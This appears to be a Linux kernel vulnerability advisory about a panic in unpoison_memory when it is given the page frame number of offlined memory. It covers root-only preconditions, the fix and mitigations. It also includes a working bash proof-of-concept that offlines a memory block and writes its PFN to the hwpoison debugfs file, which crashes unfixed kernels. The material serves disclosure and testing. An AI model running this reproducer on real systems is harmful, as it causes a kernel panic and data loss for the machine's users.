Linux kernel
cpe:2.3:a:linux:linux_kernel:*:*:*:*:*:*:*, +4 more
- >= 6.10.0-rc1-00195, < 6.10.0-rc1-00196
A vulnerability in the Linux kernel's memory-failure handling (mm/memory-failure.c) can lead to a kernel panic. It affects versions through 6.10.0-rc1-00195-g148743902568. The 'unpoison_memory' function, reached by writing a page frame number (PFN) to the hwpoison 'unpoison-pfn' debugfs file, converts that PFN to a struct page and reads its page flags without first checking that the page is online. For memory that has been offlined, the struct page is uninitialized: its contents are the poison pattern the kernel fills unused struct pages with, so the page-flag accessor's PagePoisoned sanity check (a VM_BUG_ON_PAGE, active when the CONFIG_DEBUG_VM page-flag checks are built in) fires and the kernel BUGs. The "poison" here is that struct-page memory pattern, not a hardware-poison (PG_hwpoison) mark on a live page. The problem can be reproduced by offlining a memory block, determining the PFN of the offlined memory, and writing that PFN to 'unpoison-pfn'. The condition is detectable because 'pfn_to_online_page' returns NULL for such a PFN, indicating the page is not online and must not be touched, yet the unfixed 'unpoison_memory' does not perform this check before processing the page, leading to the crash.
The vulnerability causes a kernel panic: the system stops abruptly with a fatal-exception message, unsaved data is lost, and a reboot is required to recover. Triggering it needs write access to the 'unpoison-pfn' file, which exists only on kernels built with CONFIG_HWPOISON_INJECT and lives in debugfs, which is root-only by default, as well as the ability to offline a memory block (CONFIG_MEMORY_HOTREMOVE). It is therefore a local, privileged denial of service rather than something an unprivileged user or remote party can reach.
To reproduce this vulnerability, first offline a memory block by writing 'offline' to its state file, /sys/devices/system/memory/memoryN/state. Next, obtain a page frame number (PFN) inside the offlined block; one way is to compute it from the block's phys_index and the system-wide block_size_bytes exported in the same sysfs directory, divided by the page size. Finally, write that PFN to /sys/kernel/debug/hwpoison/unpoison-pfn (debugfs must be mounted). In code, the scenario is identifiable by 'pfn_to_online_page' returning NULL for the PFN, which means the page is not online and cannot be used.
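The reproduction steps above, collected into one script, as an added example that is not part of the original advisory or of the kernel tree. It assumes the standard sysfs and debugfs paths named above, derives the PFN from phys_index * block_size_bytes / page size (one way to obtain it; the advisory does not prescribe a method), and takes the memory block number from a REPRO_BLOCK environment variable, which is this example's own convention. The pure helper pfn_of_block can be exercised safely; the repro function is destructive on an unfixed kernel and should only ever be run as root on a throwaway VM.

```shell
#!/usr/bin/env bash
# Added example for the unpoison_memory() offlined-page crash described above.
# Not from the advisory or the kernel tree; paths are the standard sysfs/debugfs
# locations, the block number (REPRO_BLOCK) is an assumption supplied by the user.
set -eu

# pfn_of_block PHYS_INDEX BLOCK_SIZE PAGE_SIZE
# PHYS_INDEX and BLOCK_SIZE are hex strings as sysfs prints them (with or without
# a 0x prefix); PAGE_SIZE is decimal. Prints the PFN of the block's first page
# in decimal: physical start = phys_index * block_size_bytes, PFN = start / page.
pfn_of_block() {
    local idx="0x${1#0x}" bsz="0x${2#0x}" psz="$3"
    echo $(( idx * bsz / psz ))
}

# sysfs_block_pfn N [SYSFS_MEMORY_ROOT]
# Reads memoryN/phys_index and block_size_bytes (root defaults to the live
# system; a different root is accepted so the logic can be tested offline).
sysfs_block_pfn() {
    local n="$1" root="${2:-/sys/devices/system/memory}"
    local idx bsz
    idx=$(cat "$root/memory$n/phys_index")
    bsz=$(cat "$root/block_size_bytes")
    pfn_of_block "$idx" "$bsz" "$(getconf PAGESIZE)"
}

# repro N: the advisory's three steps. DESTRUCTIVE: on an unfixed kernel with
# CONFIG_DEBUG_VM page-flag checks this panics the machine. Needs root,
# CONFIG_MEMORY_HOTREMOVE (to offline) and CONFIG_HWPOISON_INJECT (for the file).
repro() {
    local n="$1"
    local state="/sys/devices/system/memory/memory$n/state"
    local unpoison="/sys/kernel/debug/hwpoison/unpoison-pfn"
    [ -w "$state" ] || { echo "cannot write $state (root? hot-remove support?)" >&2; return 1; }
    [ -w "$unpoison" ] || { echo "$unpoison not writable (debugfs mounted? CONFIG_HWPOISON_INJECT?)" >&2; return 1; }

    # Step 1: offline the block (fails with EBUSY if the block is not removable).
    echo offline > "$state" || { echo "offlining block $n failed" >&2; return 1; }
    grep -qx offline "$state" || { echo "block $n did not reach 'offline'" >&2; return 1; }

    # Step 2: a PFN inside the now-offlined block; its struct page is uninitialized.
    local pfn
    pfn=$(sysfs_block_pfn "$n")
    echo "block $n offline; first PFN $pfn (0x$(printf '%x' "$pfn"))"

    # Step 3: hand that PFN to unpoison_memory(). Unfixed kernel: BUG/panic.
    # Fixed kernel: pfn_to_online_page() is NULL, so the write is rejected.
    if echo "$pfn" > "$unpoison"; then
        echo "write accepted: kernel processed a non-online PFN (not expected on a fixed kernel)"
    else
        echo "write rejected: kernel refuses non-online PFNs (fix present)"
    fi
}

# Only touch the system when explicitly asked, e.g.  REPRO_BLOCK=12 ./repro.sh
if [ -n "${REPRO_BLOCK:-}" ]; then
    repro "$REPRO_BLOCK"
fi
```

Bring the block back online afterwards with `echo online > /sys/devices/system/memory/memoryN/state` if the machine survived (i.e. the kernel carries the fix). Pick a block whose `removable` attribute reads 1; otherwise step 1 fails before anything dangerous happens.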
The vulnerability has been addressed in the Linux kernel: 'unpoison_memory' now refuses a PFN for which 'pfn_to_online_page' returns NULL instead of touching the uninitialized struct page. Users should upgrade to a kernel release, or a stable backport, that includes this fix. Until then, exposure is limited to whoever can write to debugfs, so keeping debugfs unmounted or root-only and not building CONFIG_HWPOISON_INJECT into production kernels removes the trigger.